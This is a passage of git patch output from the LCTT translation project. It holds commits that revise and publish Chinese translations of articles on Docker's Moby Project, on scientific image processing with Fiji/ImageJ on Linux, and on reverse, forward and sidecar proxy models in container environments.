代码库中提取并快速创新组件,以便系统制造商可以在构建自己的容器系统时独立重用它们:[runc][7]、[HyperKit][8]、[VPNKit][9]、[SwarmKit][10]、[InfraKit][11]、[containerd][12] 等。 +涌现出来的新独立的 Docker 组件项目帮助促进了合作伙伴生态系统和用户社区的发展。在此期间,我们从 Docker 代码库中提取并快速创新组件,以便系统制造商可以在构建自己的容器系统时独立重用它们:[runc][7]、[HyperKit][8]、[VPNKit][9]、[SwarmKit][10]、[InfraKit][11]、[containerd][12] 等。 ![Docker Open Components](https://i1.wp.com/blog.docker.com/wp-content/uploads/3-2.png?resize=975%2C548&ssl=1) -站在容器浪潮的最前沿,我们看到 2017 年出现的一个趋势是容器将成为主流,传播到计算、服务器、数据中心、云、桌面、物联网和移动的各个领域。每个行业和垂直市场、金融、医疗、政府、旅游、制造。以及每一个使用案例,现代网络应用、传统服务器应用、机器学习、工业控制系统、机器人技术。容器生态系统中许多新进入者的共同点是,它们建立专门的系统,针对特定的基础设施、行业或使用案例。 +站在容器浪潮的最前沿,我们看到 2017 年出现的一个趋势是容器将成为主流,传播到计算、服务器、数据中心、云、桌面、物联网和移动的各个领域。每个行业和垂直市场,金融、医疗、政府、旅游、制造。以及每一个使用案例,现代网络应用、传统服务器应用、机器学习、工业控制系统、机器人技术。容器生态系统中许多新进入者的共同点是,它们建立专门的系统,针对特定的基础设施、行业或使用案例。 -作为一家公司,Docker 使用开源作为我们的创新实验室,而与整个生态系统合作。Docker 的成功取决于容器生态系统的成功:如果生态系统成功,我们就成功了。因此,我们一直在计划下一阶段的容器生态系统增长:什么样的生产模式将帮助我们扩大集容器生态系统,实现容器成为主流的承诺? +作为一家公司,Docker 使用开源作为我们的创新实验室,而与整个生态系统合作。Docker 的成功取决于容器生态系统的成功:如果生态系统成功,我们就成功了。因此,我们一直在计划下一阶段的容器生态系统增长:什么样的产品模式将帮助我们扩大容器生态系统,以实现容器成为主流的承诺? -去年,我们的客户开始在 Linux 以外的许多平台上要求有 Docker:Mac 和 Windows 桌面、Windows Server、云平台(如亚马逊网络服务(AWS)、Microsoft Azure 或 Google 云平台),并且我们专门为这些平台创建了[许多 Docker 版本][13]。为了在一个相对较短的时间与更小的团队,以可扩展的方式构建和发布这些专业版本,而不必重新发明轮子,很明显,我们需要一个新的方法。我们需要我们的团队不仅在组件上进行协作,而且还在组件组合上进行协作,这借用[来自汽车行业的想法][14],其中组件被重用于构建完全不同的汽车。 +去年,我们的客户开始在 Linux 以外的许多平台上要求有 Docker:Mac 和 Windows 桌面、Windows Server、云平台(如亚马逊网络服务(AWS)、Microsoft Azure 或 Google 云平台),并且我们专门为这些平台创建了[许多 Docker 版本][13]。为了在一个相对较短的时间和更小的团队中,以可扩展的方式构建和发布这些专业版本,而不必重新发明轮子,很明显,我们需要一个新的方式。我们需要我们的团队不仅在组件上进行协作,而且还在组件组合上进行协作,这借用[来自汽车行业的想法][14],其中组件被重用于构建完全不同的汽车。 ![Docker production model](https://i1.wp.com/blog.docker.com/wp-content/uploads/4-2.png?resize=975%2C548&ssl=1) @@ -29,15 +29,13 @@ Moby 是一个新的开源项目,旨在推进软件容器化运动,帮助生 ![Moby Project](https://i0.wp.com/blog.docker.com/wp-content/uploads/5-2.png?resize=975%2C548&ssl=1) -为了实现这种新的合作高度,今天我们宣布推出软件容器化运动的新开源项目 Moby。它是提供了数十个组件的“乐高集”,一个将它们组合成定制容器系统的框架,以及所有容器爱好者进行试验和交换意见的场所。可以把 Moby 认为是容器系统的“乐高俱乐部”。 +为了实现这种新的合作高度,今天(2017 年 4 月 18 日)我们宣布推出软件容器化运动的新开源项目 Moby。它是提供了数十个组件的“乐高组件”,一个将它们组合成定制容器系统的框架,以及所有容器爱好者进行试验和交换意见的场所。可以把 Moby 认为是容器系统的“乐高俱乐部”。 -Moby包括: - -1. 容器化后端组件**库**(例如,底层构建器、日志记录设备、卷管理、网络、镜像管理、containerd、SwarmKit 等) +Moby 包括: +1. 容器化后端组件**库**(例如,低层构建器、日志记录设备、卷管理、网络、镜像管理、containerd、SwarmKit 等) 2. 将组件组合到独立容器平台中的**框架**,以及为这些组件构建、测试和部署构件的工具。 - -3. 一个名为 **Moby Origin** 的引用组件,它是 Docker 容器平台的开放基础,以及使用 Moby 库或其他项目的各种组件的容器系统示例。 +3. 一个名为 “Moby Origin” 的引用组件,它是 Docker 容器平台的开放基础,以及使用 Moby 库或其他项目的各种组件的容器系统示例。 Moby 专为系统构建者而设计,他们想要构建自己的基于容器的系统,而不是可以使用 Docker 或其他容器平台的应用程序开发人员。Moby 的参与者可以从源自 Docker 的组件库中进行选择,或者可以选择将“自己的组件”(BYOC)打包为容器,以便在所有组件之间进行混合和匹配以创建定制的容器系统。 @@ -49,9 +47,9 @@ Docker 将 Moby 作为一个开放的研发实验室来试验、开发新的组 via: https://blog.docker.com/2017/04/introducing-the-moby-project/ -作者:[Solomon Hykes ][a] +作者:[Solomon Hykes][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 8eebb504cc4c9f1d9d34ba86c648446de948084e Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 29 Nov 2017 06:43:34 +0800 Subject: [PATCH 0037/1627] PRF&PUB:20171017 Image Processing on Linux.md @XYenChi https://linux.cn/article-9091-1.html --- .../20171017 Image Processing on Linux.md | 96 +++++++++++++++++++ .../20171017 Image Processing on Linux.md | 94 ------------------ 2 files changed, 96 insertions(+), 94 deletions(-) create mode 100644 published/20171017 Image Processing on Linux.md delete mode 100644 translated/tech/20171017 Image Processing on Linux.md diff --git a/published/20171017 Image Processing on Linux.md b/published/20171017 Image Processing on Linux.md new file mode 100644 index 0000000000..32ef1a2acd --- /dev/null +++ b/published/20171017 Image Processing on Linux.md @@ -0,0 +1,96 @@ +Linux 上的科学图像处理 +============================================================ + +在显示你的数据和工作方面我发现了几个科学软件,但是我不会涉及太多方面。因此在这篇文章中,我将谈到一款叫 ImageJ 的热门图像处理软件。特别的,我会介绍 [Fiji][4],这是一款绑定了一系列用于科学图像处理插件的 ImageJ 软件。 + +Fiji 这个名字是一个循环缩略词,很像 GNU 。代表着 “Fiji Is Just ImageJ”。 ImageJ 是科学研究领域进行图像分析的实用工具 —— 例如你可以用它来辨认航拍风景图中树的种类。 ImageJ 能划分物品种类。它以插件架构制成,海量插件可供选择以提升使用灵活度。 + +首先是安装 ImageJ (或 Fiji)。大多数的 ImageJ 发行版都可有该软件包。你愿意的话,可以以这种方式安装它,然后根据你的研究安装所需的独立插件。另一种选择是安装 Fiji 的同时获取最常用的插件。不幸的是,大多数 Linux 发行版的软件中心不会有可用的 Fiji 安装包。幸而,官网上的简单安装文件是可以使用的。这是一个 zip 文件,包含了运行 Fiji 需要的所有文件目录。第一次启动时,你只会看到一个列出了菜单项的工具栏。(图 1) + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif1.png) + +*图 1. 第一次打开 Fiji 有一个最小化的界面。* + +如果你没有备好图片来练习使用 ImageJ ,Fiji 安装包包含了一些示例图片。点击“File”->“Open Samples”的下拉菜单选项(图 2)。这些示例包含了许多你可能有兴趣做的任务。 + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif2.jpg) + +*图 2. 案例图片可供学习使用 ImageJ。* + +如果你安装了 Fiji,而不是单纯的 ImageJ ,那么大量插件也会被安装。首先要注意的是自动更新器插件。每次打开 ImageJ ,该插件将联网检验 ImageJ 和已安装插件的更新。 + +所有已安装的插件都在“插件”菜单项中可选。一旦你安装了很多插件,列表会变得冗杂,所以需要精简你选择的插件。你想手动更新的话,点击“Help”->“Update Fiji” 菜单项强制检测并获取可用更新的列表(图 3)。 + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif3.png) + +*图 3. 强制手动检测可用更新。* + +那么,现在,用 Fiji/ImageJ 可以做什么呢?举一例,统计图片中的物品数。你可以通过点击“File”->“Open Samples”->“Embryos”来载入示例。 + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif4.jpg) + +*图 4. 用 ImageJ 算出图中的物品数。* + +第一步给图片设定比例,这样你可以告诉 ImageJ 如何判别物品。首先,选择在工具栏选择线条按钮。然后选择“Analyze”->“Set Scale”,然后就会设置比例尺包含的像素点个数(图 5)。你可以设置“known distance ”为 100,单元为“um”。 + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif5.png) + +*图 5. 很多图片分析任务需要对图片设定一个范围。* + +接下来的步骤是简化图片内的信息。点击“Image”->“Type”->“8-bit”来减少信息量到 8 比特灰度图片。要分隔独立物体点击“Process”->“Binary”->“Make Binary”以自动设置图片门限。(图 6)。 + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif6.png) + +*图 6. 有些工具可以自动完成像门限一样的任务。* + +图片内的物品计数前,你需要移除像比例尺之类的人工操作。可以用矩形选择工具来选中它并点击“Edit”->“Clear”来完成这项操作。现在你可以分析图片看看这里是啥物体。 + +确保图中没有区域被选中,点击“Analyze”->“Analyze Particles”来弹出窗口来选择最小尺寸,这决定了最后的图片会展示什么(图 7)。 + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif7.png) + +*图 7. 你可以通过确定最小尺寸生成一个缩减过的图片。 * + +图 8 在总结窗口展示了一个概览。每个最小点也有独立的细节窗口。 + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif8.png) + +*图 8. 包含了已知最小点总览清单的输出结果。* + +当你有一个分析程序可以工作于给定图片类型,你通常需要将相同的步骤应用到一系列图片当中。这可能数以千计,你当然不会想对每张图片手动重复操作。这时候,你可以集中必要步骤到宏,这样它们可以被应用多次。点击插件->“Macros”->“Record”,弹出一个新的窗口记录你随后的所有命令。所有步骤完成,你可以将之保存为一个宏文件,并且通过点击“Plugins”->“Macros”->“Run”来在其它图片上重复运行。 + +如果你有非常特定的工作步骤,你可以简单地打开宏文件并手动编辑它,因为它是一个简单的文本文件。事实上有一套完整的宏语言可供你更加充分地控制图片处理过程。 + +然而,如果你有真的有非常多的系列图片需要处理,这也将是冗长乏味的工作。这种情况下,前往“Process”->“Batch”->“Macro”,会弹出一个你可以设置批量处理工作的新窗口(图 9)。 + +![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif9.png) + +*图 9. 对批量输入的图片用单一命令运行宏。* + +这个窗口中,你能选择应用哪个宏文件、输入图片所在的源目录和你想写入输出图片的输出目录。也可以设置输出文件格式,及通过文件名筛选输入图片中需要使用的。万事具备之后,点击窗口下方的的“Process”按钮开始批量操作。 + +若这是会重复多次的工作,你可以点击窗口底部的“Save”按钮保存批量处理到一个文本文件。点击也在窗口底部的“Open”按钮重新加载相同的工作。这个功能可以使得研究中最冗余部分自动化,这样你就可以在重点放在实际的科学研究中。 + +考虑到单单是 ImageJ 主页就有超过 500 个插件和超过 300 种宏可供使用,简短起见,我只能在这篇短文中提出最基本的话题。幸运的是,还有很多专业领域的教程可供使用,项目主页上还有关于 ImageJ 核心的非常棒的文档。如果你觉得这个工具对研究有用,你研究的专业领域也会有很多信息指引你。 + +-------------------------------------------------------------------------------- + +作者简介: + +Joey Bernard 有物理学和计算机科学的相关背景。这对他在新不伦瑞克大学当计算研究顾问的日常工作大有裨益。他也教计算物理和并行程序规划。 + +-------------------------------- + +via: https://www.linuxjournal.com/content/image-processing-linux + +作者:[Joey Bernard][a] +译者:[XYenChi](https://github.com/XYenChi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxjournal.com/users/joey-bernard +[1]:https://www.linuxjournal.com/tag/science +[2]:https://www.linuxjournal.com/tag/statistics +[3]:https://www.linuxjournal.com/users/joey-bernard +[4]:https://imagej.net/Fiji diff --git a/translated/tech/20171017 Image Processing on Linux.md b/translated/tech/20171017 Image Processing on Linux.md deleted file mode 100644 index d02c2f3bd4..0000000000 --- a/translated/tech/20171017 Image Processing on Linux.md +++ /dev/null @@ -1,94 +0,0 @@ -Linux上的图像处理 -============================================================ - - -我发现了很多生成图像表示你的数据和工作的系统软件,但是我不能写太多其他东西。因此在这篇文章中,包含了一款叫 ImageJ 的热门图像处理软件。特别的,我注意到了 [Fiji][4], 一例绑定了科学性图像处理的系列插件的 ImageJ 版本。 - -Fiji这个名字是一个循环缩略词,很像 GNU 。代表着 "Fiji Is Just ImageJ"。 ImageJ 是科学研究领域进行图像分析的实用工具——例如你可以用它来辨认航拍风景图中树的种类。 ImageJ 能划分物品种类。它以插件架构制成,海量插件供选择以提升使用灵活度。 - -首先是安装 ImageJ (或 Fiji). 大多数的 ImageJ 发行版都可使用软件包。你愿意的话,可以以这种方式安装它然后为你的研究安装所需的独立插件。另一种选择是安装 Fiji 的同时获取最常用的插件。不幸的是,大多数 Linux 发行版的软件中心不会有可用的 Fiji 安装包。幸而,官网上的简单安装文件是可以使用的。包含了运行 Fiji 需要的所有文件目录。第一次启动时,会给一个有菜单项列表的工具栏。(图1) - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif1.png) - -图 1\.第一次打开 Fiji 有一个最小化的界面。 - -如果你没有备好图片来练习使用 ImageJ ,Fiji 安装包包含了一些示例图片。点击文件->打开示例图片的下拉菜单选项(图2)。这些案例包含了许多你可能有兴趣做的任务。 - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif2.jpg) - -图 2\. 案例图片可供学习使用 ImageJ。 - -安装了 Fiji,而不是单纯的 ImageJ ,大量插件也会被安装。首先要注意的是自动更新插件。每次打开 ImageJ ,该插件联网检验 ImageJ 和已安装插件的更新。所有已安装的插件都在插件菜单项中可选。一旦你安装了很多插件,列表会变得冗杂,所以需要精简你的插件选项。你想手动更新的话,点击帮助->更新 Fiji 菜单项强制检测获取可用更新列表(图3)。 - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif3.png) - -图 3\. 强制手动检测可用更新。 - -那么,Now,用 Fiji/ImageJ 可以做什么呢?举一例,图片中的物品数。你可以通过点击文件->打开示例->胚芽来载入一例。 - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif4.jpg) - -图 4\. 用 ImageJ算出图中的物品数。 - -第一步设定图片的范围这样你可以告诉 ImageJ 如何判别物品。首先,选择在工具栏选择线条按钮。然后选择分析->设定范围,然后就会设置范围内包含的像素点个数(图 5)。你可以设置已知距离为100,单元为“um”。 - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif5.png) - -图 5\. 很多图片分析任务需要对图片设定一个范围。 - -接下来的步骤是简化图片内的信息。点击图片->类型->8比特来减少信息量到8比特灰度图片。点击处理->二进制->图片定界, 以分隔独立物体。点击处理->二进制->设置二进制来自动给图片定界(图 6)。 - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif6.png) - -图 6\. 有些像开关一样完成自动任务的工具。 - -图片内的物品计数前,你需要移除像范围轮廓之类的人工操作。可以用三角选择工具来选中它并点击编辑->清空来完成这项操作。现在你可以分析图片看看这里是啥物体。 - -确保图中没有区域被选中,点击分析->分析最小粒子弹出窗口来选择最小尺寸,这决定了最后的图片会展示什么(图7)。 - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif7.png) - -图 7\.你可以通过确定最小尺寸生成一个缩减过的图片。 - -图 8 在总结窗口展示了一个概览。每个最小点也有独立的细节窗口。 - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif8.png) - -图 8\. 包含了已知最小点总览清单的输出结果。 - -只要你有一个分析程序来给定图片类型,相同的程序往往需要被应用到一系列图片当中。可能数以千计,你当然不会想对每张图片手动重复操作。这时候,你可以集中必要步骤到宏这样它们可以被应用多次。点击插件->宏- >记录弹出一个新的窗口记录你随后的所有命令。所有步骤一完成,你可以将之保存为一个宏文件并且通过点击插件->宏->运行来在其他图片上重复运行。 - -如果你有特定的工作步骤,你可以轻易打开宏文件并手动编辑它,因为它是一个简单的文本文件。事实上有一套完整的宏语言可供你更加充分地控制图片处理过程。 - -然而,如果你有真的非常多的系列图片需要处理,这也将是冗长乏味的工作。这种情况下,前往过程->批量->宏弹出一个新窗口你可以批量处理工作(图9)。 - -![](http://www.linuxjournal.com/files/linuxjournal.com/ufiles/imagecache/large-550px-centered/u1000009/12172fijif9.png) - -图 9\. 在批量输出图片时用简单命令运行宏。 - -这个窗口中,你能选择应用哪个宏文件,输入图片所在的源目录和你想写入输出图片的输出目录。也可以设置输出文件格式及通过文件名筛选输入图片中需要使用的。万事具备,点击窗口下方的的处理按钮开始批量操作。 - -若这是会重复多次的工作,你可以点击窗口底部的保存按钮保存批量处理到一个文本文件。点击也在窗口底部的开始按钮重载相同的工作。所有的应用都使得研究中最冗余部分自动化,这样你就可以在重点放在实际的科学研究中。 -考虑到单单是 ImageJ 主页就有超过500个插件和超过300种宏可供使用,简短起见,我只能在这篇短文中提出最基本的话题。幸运的是,有很多专业领域的教程可供使用,项目主页上还有关于 ImageJ 核心的非常棒的文档。如果觉得这个工具对研究有用,你研究的专业领域也会有很多信息指引你。 - --------------------------------------------------------------------------------- - -作者简介: - -Joey Bernard 有物理学和计算机科学的相关背景。这对他在新不伦瑞克大学当计算研究顾问的日常工作大有裨益。他也教计算物理和并行程序规划。 - --------------------------------- - -via: https://www.linuxjournal.com/content/image-processing-linux - -作者:[Joey Bernard][a] -译者:[XYenChi](https://github.com/XYenChi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linuxjournal.com/users/joey-bernard -[1]:https://www.linuxjournal.com/tag/science -[2]:https://www.linuxjournal.com/tag/statistics -[3]:https://www.linuxjournal.com/users/joey-bernard -[4]:https://imagej.net/Fiji From 55c5d78f9675ac9884d4412b48a047d115caab5d Mon Sep 17 00:00:00 2001 From: geekpi Date: Wed, 29 Nov 2017 08:44:55 +0800 Subject: [PATCH 0038/1627] translated --- ... Proxy Models in Container Environments.md | 90 ------------------- ... Proxy Models in Container Environments.md | 86 ++++++++++++++++++ 2 files changed, 86 insertions(+), 90 deletions(-) delete mode 100644 sources/tech/20171014 Proxy Models in Container Environments.md create mode 100644 translated/tech/20171014 Proxy Models in Container Environments.md diff --git a/sources/tech/20171014 Proxy Models in Container Environments.md b/sources/tech/20171014 Proxy Models in Container Environments.md deleted file mode 100644 index fa57b306a8..0000000000 --- a/sources/tech/20171014 Proxy Models in Container Environments.md +++ /dev/null @@ -1,90 +0,0 @@ -translating---geekpi - - -Proxy Models in Container Environments -============================================================ - -### Most of us are familiar with how proxies work, but is it any different in a container-based environment? See what's changed. - -Inline, side-arm, reverse, and forward. These used to be the terms we used to describe the architectural placement of proxies in the network. - -Today, containers use some of the same terminology, but they are introducing new ones. That’s an opportunity for me to extemporaneously expound* on my favorite of all topics: the proxy. - -One of the primary drivers of cloud (once we all got past the pipedream of cost containment) has been scalability. Scale has challenged agility (and sometimes won) in various surveys over the past five years as the number one benefit organizations seek by deploying apps in cloud computing environments. - -That’s in part because in a digital economy (in which we now operate), apps have become the digital equivalent of brick-and-mortar “open/closed” signs and the manifestation of digital customer assistance. Slow, unresponsive apps have the same effect as turning out the lights or understaffing the store. - -Apps need to be available and responsive to meet demand. Scale is the technical response to achieving that business goal. Cloud not only provides the ability to scale, but offers the ability to scale  _automatically_ . To do that requires a load balancer. Because that’s how we scale apps – with proxies that load balance traffic/requests. - -Containers are no different with respect to expectations around scale. Containers must scale – and scale automatically – and that means the use of load balancers (proxies). - -If you’re using native capabilities, you’re doing primitive load balancing based on TCP/UDP. Generally speaking, container-based proxy implementations aren’t fluent in HTTP or other application layer protocols and don’t offer capabilities beyond plain old load balancing ([POLB][1]). That’s often good enough, as container scale operates on a cloned, horizontal premise – to scale an app, add another copy and distribute requests across it. Layer 7 (HTTP) routing capabilities are found at the ingress (in [ingress controllers][2] and API gateways) and are used as much (or more) for app routing as they are to scale applications. - -In some cases, however, this is not enough. If you want (or need) more application-centric scale or the ability to insert additional services, you’ll graduate to more robust offerings that can provide programmability or application-centric scalability or both. - -To do that means [plugging-in proxies][3]. The container orchestration environment you’re working in largely determines the deployment model of the proxy in terms of whether it’s a reverse proxy or a forward proxy. Just to keep things interesting, there’s also a third model – sidecar – that is the foundation of scalability supported by emerging service mesh implementations. - -### Reverse Proxy - - [![Image title](https://devcentral.f5.com/Portals/0/Users/038/38/38/unavailable_is_closed_thumb.png?ver=2017-09-12-082119-957 "Image title")][4] - -A reverse proxy is closest to a traditional model in which a virtual server accepts all incoming requests and distributes them across a pool (farm, cluster) of resources. - -There is one proxy per ‘application’. Any client that wants to connect to the application is instead connected to the proxy, which then chooses and forwards the request to an appropriate instance. If the green app wants to communicate with the blue app, it sends a request to the blue proxy, which determines which of the two instances of the blue app should respond to the request. - -In this model, the proxy is only concerned with the app it is managing. The blue proxy doesn’t care about the instances associated with the orange proxy, and vice-versa. - -### Forward Proxy - - [![Image title](https://devcentral.f5.com/Portals/0/Users/038/38/38/per-node_forward_proxy_thumb.jpg?ver=2017-09-14-072422-213)][5] - -This mode more closely models that of a traditional outbound firewall. - -In this model, each container **node** has an associated proxy. If a client wants to connect to a particular application or service, it is instead connected to the proxy local to the container node where the client is running. The proxy then chooses an appropriate instance of that application and forwards the client's request. - -Both the orange and the blue app connect to the same proxy associated with its node. The proxy then determines which instance of the requested app instance should respond. - -In this model, every proxy must know about every application to ensure it can forward requests to the appropriate instance. - -### Sidecar Proxy - - [![Image title](https://devcentral.f5.com/Portals/0/Users/038/38/38/per-pod_sidecar_proxy_thumb.jpg?ver=2017-09-14-072425-620)][6] - -This mode is also referred to as a service mesh router. In this model, each **container **has its own proxy. - -If a client wants to connect to an application, it instead connects to the sidecar proxy, which chooses an appropriate instance of that application and forwards the client's request. This behavior is the same as a  _forward proxy _ model. - -The difference between a sidecar and forward proxy is that sidecar proxies do not need to modify the container orchestration environment. For example, in order to plug-in a forward proxy to k8s, you need both the proxy  _and _ a replacement for kube-proxy. Sidecar proxies do not require this modification because it is the app that automatically connects to its “sidecar” proxy instead of being routed through the proxy. - -### Summary - -Each model has its advantages and disadvantages. All three share a reliance on environmental data (telemetry and changes in configuration) as well as the need to integrate into the ecosystem. Some models are pre-determined by the environment you choose, so careful consideration as to future needs – service insertion, security, networking complexity – need to be evaluated before settling on a model. - -We’re still in early days with respect to containers and their growth in the enterprise. As they continue to stretch into production environments it’s important to understand the needs of the applications delivered by containerized environments and how their proxy models differ in implementation. - -*It was extemporaneous when I wrote it down. Now, not so much. - - --------------------------------------------------------------------------------- - -via: https://dzone.com/articles/proxy-models-in-container-environments - -作者:[Lori MacVittie ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://dzone.com/users/307701/lmacvittie.html -[1]:https://f5.com/about-us/blog/articles/go-beyond-polb-plain-old-load-balancing -[2]:https://f5.com/about-us/blog/articles/ingress-controllers-new-name-familiar-function-27388 -[3]:http://clouddocs.f5.com/products/asp/v1.0/ -[4]:https://devcentral.f5.com/Portals/0/Users/038/38/38/unavailable_is_closed.png?ver=2017-09-12-082118-160 -[5]:https://devcentral.f5.com/Portals/0/Users/038/38/38/per-node_forward_proxy.jpg?ver=2017-09-14-072419-667 -[6]:https://devcentral.f5.com/Portals/0/Users/038/38/38/per-pod_sidecar_proxy.jpg?ver=2017-09-14-072424-073 -[7]:https://dzone.com/users/307701/lmacvittie.html -[8]:https://dzone.com/users/307701/lmacvittie.html -[9]:https://dzone.com/articles/proxy-models-in-container-environments# -[10]:https://dzone.com/cloud-computing-tutorials-tools-news -[11]:https://dzone.com/articles/proxy-models-in-container-environments# -[12]:https://dzone.com/go?i=243221&u=https%3A%2F%2Fget.platform9.com%2Fjzlp-kubernetes-deployment-models-the-ultimate-guide%2F diff --git a/translated/tech/20171014 Proxy Models in Container Environments.md b/translated/tech/20171014 Proxy Models in Container Environments.md new file mode 100644 index 0000000000..4e5b329d68 --- /dev/null +++ b/translated/tech/20171014 Proxy Models in Container Environments.md @@ -0,0 +1,86 @@ +容器环境中的代理模型 +============================================================ + +### 我们大多数人都熟悉代理如何工作,但在基于容器的环境中有什么不同?看看有什么改变。 + +内联,side-arm,反向和前向。这些曾经是我们用来描述网络代理架构布局的术语。 + +如今,容器使用一些相同的术语,但它们正在引入新的东西。这对我是个机会来阐述我最爱的所有主题:代理。 + +云的主要驱动之一(我们曾经有过成果控制的白日梦)就是可扩展性。在过去五年中,扩展在各种调查中面临着敏捷性的挑战(有时甚至获胜),因为这是机构在云计算环境中部署应用的最大追求。 + +这在一定程度上是因为在数字经济 (我们现在运营的) 中,应用已经成为数字等同于实体店的“开放/关闭”的标志和数字客户援助的体现。缓慢、无响应的应用程序等同于把灯关闭或者商店人员不足。 + +应用程序需要可用且响应满足需求。扩展是实现这一业务目标的技术响应。云不仅提供了扩展的能力,而且还提供了_自动_扩展的能力。要做到这一点,需要一个负载均衡器。因为这就是我们扩展应用程序的方式 - 使用代理负载均衡流量/请求。 + +容器在扩展上与预期没有什么不同。容器必须进行扩展 - 并自动扩展 - 这意味着使用负载均衡器(代理)。 + +如果你使用的是本机,则你正在基于 TCP/UDP 进行基本的负载平衡。一般来说,基于容器的代理实现在 HTTP 或其他应用层协议中不流畅,除了一般的旧的负载均衡([POLB][1])之外,不提供其他功能。这通常足够好,因为容器扩展是在一个克隆的水平预置环境中进行的 - 要扩展一个应用程序,添加另一个副本并在其上分发请求。在入口处(在[入口控制器][2]和 API 网关中)可以找到第 7 层(HTTP)路由功能,并且可以使用尽可能多(或更多)的应用程序路由来扩展应用程序。 + +然而,在某些情况下,这还不够。如果你希望(或需要)更多以应用程序为中心的扩展或插入其他服务的能力,那么你将获得更健壮的产品,可提供可编程性或以应用程序为中心的可伸缩性,或者两者兼而有之。 + +这意味着[插入代理][3]。你正在使用的容器编排环境在很大程度上决定了代理的部署模型,无论它是反向代理还是前向代理。为了让事情有趣,还有第三个模型 - sidecar - 这是由新兴的服务网格实现支持的可扩展性的基础。 + +### 反向代理 + + [![Image title](https://devcentral.f5.com/Portals/0/Users/038/38/38/unavailable_is_closed_thumb.png?ver=2017-09-12-082119-957 "Image title")][4] + +反向代理最接近于传统模型,在这种模型中,虚拟服务器接受所有传入请求,并将其分发到资源池(服务器中心,集群)中。 + +每个“应用程序”有一个代理。任何想要连接到应用程序的客户端连接到代理,代理然后选择并转发请求到适当的实例。如果绿色应用想要与蓝色应用通信,它会向蓝色代理发送请求,蓝色代理会确定蓝色应用的两个实例中的哪一个应该响应该请求。 + +在这个模型中,代理只关心它正在管理的应用程序。蓝色代理不关心与橙色代理关联的实例,反之亦然。 + +### 前向代理 + + [![Image title](https://devcentral.f5.com/Portals/0/Users/038/38/38/per-node_forward_proxy_thumb.jpg?ver=2017-09-14-072422-213)][5] + +这种模式更接近传统出站防火墙的模式。 + +在这个模型中,每个容器 **节点** 都有一个关联的代理。如果客户端想要连接到特定的应用程序或服务,它将连接到正在运行的客户端所在的容器节点的本地代理。代理然后选择一个适当的应用实例,并转发客户端的请求。 + +橙色和蓝色的应用连接到与其节点相关的同一个代理。代理然后确定所请求的应用实例的哪个实例应该响应。 + +在这个模型中,每个代理必须知道每个应用,以确保它可以将请求转发给适当的实例。 + +### sidecar 代理 + + [![Image title](https://devcentral.f5.com/Portals/0/Users/038/38/38/per-pod_sidecar_proxy_thumb.jpg?ver=2017-09-14-072425-620)][6] + +这种模型也被称为服务网格路由。在这个模型中,每个**容器**都有自己的代理。 + +如果客户想要连接到一个应用,它将连接到 sidecar 代理,它会选择一个合适的应用程序实例并转发客户端的请求。此行为与_前向代理_模型相同。 + +sidecar 和前向代理之间的区别在于,sidecar 代理不需要修改容器编排环境。例如,为了插入一个前向代理到 k8s,你需要代理_和_一个 kube-proxy 的替代。sidecar 代理不需要此修改,因为应用会自动连接到 “sidecar” 代理而不是通过代理路由。 + +### 总结 + +每种模式都有其优点和缺点。三者共同依赖环境数据(远程监控和配置变化),以及融入生态系统的需求。有些模型是根据你选择的环境预先确定的,因此需要仔细考虑将来的需求 - 服务插入、安全性、网络复杂性 - 在建立模型之前需要进行评估。 + +在容器及其在企业中的发展方面,我们还处于早期阶段。随着它们继续延伸到生产环境中,了解容器化环境发布的应用程序的需求以及它们在代理模型实现上的差异是非常重要的。 + +我是急性写下这篇文章的。现在就这么多。 + +-------------------------------------------------------------------------------- + +via: https://dzone.com/articles/proxy-models-in-container-environments + +作者:[Lori MacVittie ][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + 